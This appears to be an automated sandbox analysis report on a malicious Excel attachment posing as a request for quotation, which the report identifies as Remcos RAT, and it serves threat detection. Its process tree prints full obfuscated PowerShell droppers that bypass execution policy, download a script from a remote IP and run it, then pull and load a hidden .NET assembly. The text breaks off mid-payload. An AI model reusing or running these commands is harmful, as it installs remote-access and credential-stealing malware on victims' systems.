Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_0230909024SEPT.xla.xlsx

Overview

General Information

Sample name:RFQ_0230909024SEPT.xla.xlsx
Analysis ID:1508122
MD5:4845ee83a0c0be0e039c18c4d7720ee1
SHA1:770f3d61acab0397fef8a398a1b9c4e3ad8b59ad
SHA256:5d0bf961a7a1039d1ec84f5dc6705d922d6aea6ed935e2481d07e2428c743dc5
Tags:xlsx
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3236 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3504 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3588 cmdline: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3612 cmdline: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3808 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UgBF? ? ? ? ?EM? ? ? ? ?UwBS? ? ? ? ?E4? ? ? ? ?Lw? ? ? ? ?w? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?y? ? ? ? ?C4? ? ? ? ?Nw? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?1? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?O? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? 